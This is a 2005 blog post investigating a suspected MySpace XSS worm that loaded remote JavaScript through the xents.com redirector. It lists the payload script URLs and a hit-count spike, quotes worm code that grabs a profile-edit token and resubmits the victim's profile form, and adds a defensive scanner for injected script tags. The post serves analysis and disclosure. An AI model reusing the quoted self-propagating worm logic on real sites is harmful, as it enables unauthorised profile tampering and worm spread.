Thursday, December 08, 2005


mystery: myspace sends xents a half million hits

So I know the webmaster over at xents.com (a short URL service), and he was telling me that five of their links produced an incredible half million hits in the last two days. The poor little box the site runs on was nearly buried alive. It appears that someone used the URL redirection to load a remote JavaScript file on literally thousands of MySpace pages. The problem is that neither of us can figure out what the file does or how it got so widely dispersed on MySpace. Any smart people able to lend a clue?

Here are the JavaScript files:

http://home.doramail.com/90za:doramail.com/a.js
http://http://90za.biz.tc/b.js
http://90za.biz.tc/b.js
http://64.34.165.134/c.js
http://64.207.146.9/d.js

And here are 5 (of thousands) MySpace profiles that loaded it. Warning: these pages may not be safe for work. Search the source for "xents" to see the JavaScript call:

Profile 1
Profile 2
Profile 3

Here is the hit count spike:

12/01/2005 1
12/02/2005 3
12/03/2005 3
12/04/2005 8
12/05/2005 916
12/06/2005 412888
12/07/2005 11610
12/08/2005 814

Would love to be able to publish more information.

UPDATE from digg user bonzooznob:

XSS hack in progress is my guess...

Since the file it points to isn't there (yet), this may be a ticking time bomb...

(Similar to the Sober virus due to hit on Jan 5th, 2006)
http://www.f-secure.com/weblog/

If I were a MySpace user, and I had anything important on there, I would consider making a backup ;-)

UPDATE: If I'm reading this right, it appears to be using JavaScript to pull data off the page and make a form submission to MySpace. Very clever. Anyone able to figure out more?

    // request(), getToken() and parseForm() are helpers from the same script; they are not reproduced here.
    if (window.location.hostname == 'profile.myspace.com') {
        // Viewer is on profile.myspace.com: bounce them to the same path on www.myspace.com
        window.location.href = 'http://www.myspace.com' + location.pathname + location.search;
    } else if (window.location.href.indexOf("http://editprofile.myspace.com/index.cfm?fuseaction=profile.basic") != -1) {
        // Viewer is on the edit-profile page: send them away to profiles.myspace.com
        window.location.href = 'http://profiles.myspace.com/';
    } else {
        // Otherwise fetch the viewer's own "edit basic profile" page in the background
        occPage = request("http://www.myspace.com/index.cfm?fuseaction=profile.editBasic", "GET", null);
        occPage.onreadystatechange = function () {
            if (occPage.readyState == 4) {
                if (occPage.status == 200) {
                    // Pull the Mytoken value and the form fields out of the fetched page,
                    // then POST them back to the profile-update handler (the form submission described above)
                    currToken = getToken(occPage);
                    var occVars = parseForm(occPage);
                    var occForm = "http://www.myspace.com/index.cfm?fuseaction=profile.processBasic&Mytoken=" + currToken;
                    addOcc = request(occForm, "POST", occVars);
                } else {
                }
            }
        };
    }
UPDATE: Looks like this may not be the first time this has happened. Found a digg link from 25 days ago about the last MySpace worm, and some more information on how that worm worked.
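As an added example (not code from the original post or from MySpace), here is the kind of server-side check a site could run over free-text profile fields to catch the injection described above: a script tag, loaded through a redirector like xents.com, stored in a field such as "occupation". The regexes, the redirector host list and the sample field value are assumptions constructed for illustration.

```javascript
// Added example: scan a stored profile field for injected script loads and
// show the encoding that would have made the field render as plain text.
// REDIRECTOR_HOSTS and the regexes are assumptions for this illustration.

const REDIRECTOR_HOSTS = new Set(["xents.com"]); // redirector named in the post

// <script ...> opening tags, capturing the attribute string.
const SCRIPT_TAG_RE = /<script\b([^>]*)>/gi;
// src="..." / src='...' / src=unquoted inside a tag's attributes.
const SRC_ATTR_RE = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
// Inline event handlers such as onload= or onmouseover=.
const EVENT_HANDLER_RE = /\bon[a-z]+\s*=/i;

function hostOf(url) {
  try {
    return new URL(url, "http://www.myspace.com/").hostname.toLowerCase();
  } catch (e) {
    return null; // unparsable src: report it, but with no host
  }
}

// Returns one finding per script tag or event handler found in the field.
function findInjectedScripts(fieldValue) {
  const findings = [];
  let m;
  SCRIPT_TAG_RE.lastIndex = 0;
  while ((m = SCRIPT_TAG_RE.exec(fieldValue)) !== null) {
    const s = SRC_ATTR_RE.exec(m[1]);
    const src = s ? (s[1] || s[2] || s[3]) : null;
    const host = src ? hostOf(src) : null;
    findings.push({
      kind: src ? "external-script" : "inline-script",
      src,
      host,
      viaRedirector: host !== null && REDIRECTOR_HOSTS.has(host),
    });
  }
  if (EVENT_HANDLER_RE.test(fieldValue)) {
    findings.push({ kind: "event-handler", src: null, host: null, viaRedirector: false });
  }
  return findings;
}

// Encode a field so the browser renders it as text rather than markup.
function escapeProfileField(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample of an infected occupation field (path is a placeholder).
const SAMPLE_FIELD = 'Student <script src="http://xents.com/EXAMPLE-PATH"></script>';
```

Running findInjectedScripts(SAMPLE_FIELD) flags one external script whose host is on the redirector list, which is the signal the hit-count spike above would have given a monitoring job much earlier.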


Comments:
It looks like the javascript was added to the occupation field of these profiles. No idea why everyone would change that field on their own.